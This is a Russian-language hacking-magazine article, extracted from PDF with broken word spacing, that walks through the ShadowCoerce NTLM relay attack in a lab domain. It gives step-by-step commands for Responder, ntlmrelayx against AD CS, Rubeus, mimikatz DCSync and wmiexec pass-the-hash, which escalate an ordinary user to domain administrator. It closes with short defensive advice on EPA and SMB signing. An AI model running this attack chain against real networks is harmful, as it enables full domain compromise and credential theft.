Для ShadowCoerce доступен PoC, который демонстри рует злоупот ребле ние этими функци ями . Исполнение кода заставля ет учетную запись контрол лера домена запросить общий ресурс NETLOGON или SYSVOL из системы , находящей ся под контро лем злоумыш ленни ка . Принуди тель ная аутентифика ция выполняет ся через SMB, в отличие от других подобных методов принуж

дения (PrinterBug и PetitPotam).

При эксплу ата ции уязвимос ти NTLMv2-хеш учетной записи хоста контрол лера домена оказыва ется захвачен . Затем этот хеш передается в центр сер тификации , чтобы зарегистри ровать сертификат . После чего его можно использовать для аутентифика ции на контрол лере домена через службу

Kerberos.

В журнале событий контрол лера домена видим, как запускает ся сам про цесс и служба VSS.

Подклю чение к сетевому ресурсу от имени user

Запуск процес са fssagent и службы VSS

Давай разберем сам процесс атаки ShadowCoerce.

Для ее проведе ния злоумыш ленник выполняет следующие действия .

1.Подклю чается к сетевому ресурсу с помощью экспло ита и злоупот ребляет функци ями IsPathSupported и IsPathShadowCopied в протоко ле MSFSRVP.

2.Получа ет NTLMv2-хеш от контрол лера домена (SMB). Вредонос ный код принуж дает учетную запись контрол лера домена к аутентифика ции по про токолу SMB на захвачен ном компьюте ре.

3.Перенап равляет хеш в центр сертифика ции (LDAP).

4.Получа ет сертификат в Base64.

ЭКСПЛУАТАЦИЯ

Теперь я покажу, как выглядит сама эксплу ата ция .

Чтобы проверить , что служба VSS работает , попытаемся перехватить

NTLMv2 с помощью Responder.

sudo responder -I eth0 -e <ip слушателя> -b -A -v

Нам понадобят ся учетные данные любого пользовате ля домена, IP-адрес слушате ля и IP-адрес контрол лера домена. Пусть тебя не пугает ошибка под ключения при первом запуске .

python3 shadowcoerce.py -d "домен" -u "имя пользователя" -p "пароль"

<IP слушателя> <IP контроллера домена>0

Посколь ку на Kali мы слушаем SMB, нами будет захвачен хеш NTLMv2 учетной записи компьюте ра контрол лера домена.

Если в домене есть центр сертифика ции , а он у нас есть, мы можем перенап равить на него NTLMv2-хеш через протокол HTTP. Идея в том, чтобы сместить наш вектор в сторону получения сертифика та , так как использовать его будет проще , чем Net-NTLMv2-хеш.

python3 ntlmrelayx.py -t http://<IP центра сертификации>/certsrv/

certfnsh.asp -smb2support --adcs --template DomainController0

После успешной атаки нам будет выдан сертификат в Base64.

Исполь зуя сертификат , мы можем запросить билет TGT (Ticket-Granting Ticket, «билет на получение билета») для учетной записи контрол лера домена (DC1) с помощью инстру мен та под названи ем Rubeus.

Rubeus.exe asktgt /user:DC1$ /certificate:<сертификат в Base64> /ptt0

Наличие TGT для учетки контрол лера домена эквивален тно правам локаль ного админис тра тора . TGT может быть использован , например , для проведе ния атаки DCSync c последу ющим закрепле нием в домене с помощью Golden ticket.

С помощью утилиты mimikatz проведем атаку DCSync и заберем NTLMхеш админис тра тора домена.

Админис тратором домена на нашем стенде является пользователь TH.

lsadump::dcsync /domain:домен /user:пользователь0

python3 wmiexec.py -hashes :NTLM хеш пользователя@<

IP контроллера домена>0

ВЫВОДЫ

Мы подняли привиле гии с простого пользовате ля до админис тра тора домена. Для этого нам понадобилась всего одна действу ющая учетная запись и пара команд в консоли .

Атаки ретран сляции NTLM существу ют уже довольно давно , но, как мы видим, исследова тели ежегод но находят новые обходные пути для эксплу ата ции. Примеча тельно, что эта атака , в отличие от прошлых , не использует уяз вимые функции в протоко ле RPC, а опирает ся на протокол общего доступа

к файлам SMB.

Если ты админис трируешь сеть, где включен NTLM, убедись , что службы , разреша ющие провер ку подлиннос ти NTLM, используют средства защиты. Среди них — расширен ная защита для провер ки подлиннос ти (EPA) или фун кции подписи , такие как подпись SMB. А еще твоя сеть потенциаль но уяз вима, если в домене включена провер ка подлиннос ти NTLM и использует ся служба сертифика ции Active Directory (AD CS) с любой из следующих служб:

•интернет регистра ция центра сертифика ции ;

•веб служба регистра ции сертифика тов .

Официаль ных заявлений Microsoft по поводу описыва емой атаки на момент написания статьи не делалось.

1 / 41 2 3 4 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202420.31 Mб1xa-282_Optimized.pdf
#
20.04.20246.94 Mб1ха-263_Optimized.pdf
#
20.04.202410.76 Mб1ха-264_Optimized.pdf
#
20.04.202412.1 Mб1ха-265_Optimized.pdf
#
20.04.202410.8 Mб1ха-272_Optimized.pdf
#
20.04.202412.37 Mб1ха-277_Optimized.pdf
#
20.04.202422.43 Mб1ха-283_Optimized.pdf
#
20.04.202417.09 Mб1ха-284_Optimized.pdf
#
20.04.202411.5 Mб1ха-285_Optimized.pdf
#
20.04.202416.06 Mб1ха-286_Optimized.pdf
#
20.04.202418.64 Mб1ха-287_Optimized.pdf